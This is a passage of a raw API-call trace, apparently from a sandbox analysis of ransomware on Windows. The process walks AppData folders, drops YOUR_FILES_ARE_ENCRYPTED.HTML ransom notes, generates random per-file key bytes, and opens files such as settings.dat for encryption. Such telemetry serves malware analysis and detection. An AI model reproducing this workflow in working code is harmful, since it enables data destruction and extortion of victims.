ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.685] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 0 [0119.686] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.686] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 147 [0119.686] GetProcessHeap () returned 0x600000 [0119.686] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.686] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.687] WriteFile (in: hFile=0x31c, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.689] CloseHandle (hObject=0x31c) returned 1 [0119.689] GetProcessHeap () returned 0x600000 [0119.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.689] GetProcessHeap () returned 0x600000 [0119.689] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.689] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0119.689] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.689] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings") returned 113 [0119.689] GetProcessHeap () returned 0x600000 [0119.689] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.689] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings" [0119.689] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\*" [0119.689] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9332a8a0, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0119.691] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9332a8a0, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.691] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0119.691] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.691] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\roaming.lock") returned 126 [0119.691] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.691] lstrlenW (lpString=".lock") returned 5 [0119.691] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0119.691] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9345bc4f, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9345bc4f, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0119.691] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.691] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat") returned 126 [0119.691] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.691] lstrlenW (lpString=".dat") returned 4 [0119.691] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0119.691] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0119.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0119.692] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0119.692] GetProcessHeap () returned 0x600000 [0119.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0119.696] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="25") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="EE") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="FC") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="41") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="4E") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="7D") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="CB") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="6B") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="A4") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="F6") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="8F") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="FD") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="5A") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="FB") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="9A") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="59") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="D9") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D4") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="22") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="74") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="0F") returned 2 [0119.696] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="F4") returned 2 [0119.696] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="69") returned 2 [0119.696] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="42") returned 2 [0119.696] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="DD") returned 2 [0119.696] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="29") returned 2 [0119.696] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="2D") returned 2 [0119.697] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="B8") returned 2 [0119.697] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="B7") returned 2 [0119.697] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="38") returned 2 [0119.697] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="18") returned 2 [0119.697] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7B") returned 2 [0119.697] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat" [0119.697] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0119.698] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0119.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9332a8a0, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9332a8a0, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9332a8a0, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0119.698] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.698] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 131 [0119.698] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.698] lstrlenW (lpString=".LOG1") returned 5 [0119.698] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0119.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9332a8a0, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9332a8a0, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9332a8a0, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0119.698] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.698] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 131 [0119.698] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.698] lstrlenW (lpString=".LOG2") returned 5 [0119.698] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0119.698] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9332a8a0, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x9332a8a0, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9332a8a0, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0119.698] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0119.699] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0119.699] GetProcessHeap () returned 0x600000 [0119.699] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x698498 [0119.700] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0119.701] WriteFile (in: hFile=0x31c, lpBuffer=0x698498*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x698498*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.702] CloseHandle (hObject=0x31c) returned 1 [0119.702] GetProcessHeap () returned 0x600000 [0119.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x698498 | out: hHeap=0x600000) returned 1 [0119.702] GetProcessHeap () returned 0x600000 [0119.702] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.702] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0119.702] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.702] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData") returned 118 [0119.702] GetProcessHeap () returned 0x600000 [0119.702] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.759] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData" [0119.760] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\*" [0119.760] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.760] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.760] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e89cc4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e89cc4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e89cc4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 0 [0119.760] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0119.760] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 148 [0119.760] GetProcessHeap () returned 0x600000 [0119.760] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x30f4fc8 [0119.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0119.762] WriteFile (in: hFile=0x320, lpBuffer=0x30f4fc8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x30f4fc8*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0119.764] CloseHandle (hObject=0x320) returned 1 [0119.764] GetProcessHeap () returned 0x600000 [0119.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0119.764] GetProcessHeap () returned 0x600000 [0119.764] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0119.765] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0119.765] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0119.765] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState") returned 114 [0119.766] GetProcessHeap () returned 0x600000 [0119.766] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0119.767] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState" [0119.767] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\*" [0119.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName=".", cAlternateFileName="")) returned 0x626978 [0119.767] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97e6396b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x97e6396b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x97e6396b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5f6a, dwReserved1=0x6f5e98, cFileName="..", cAlternateFileName="")) returned 1 [0119.767] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: 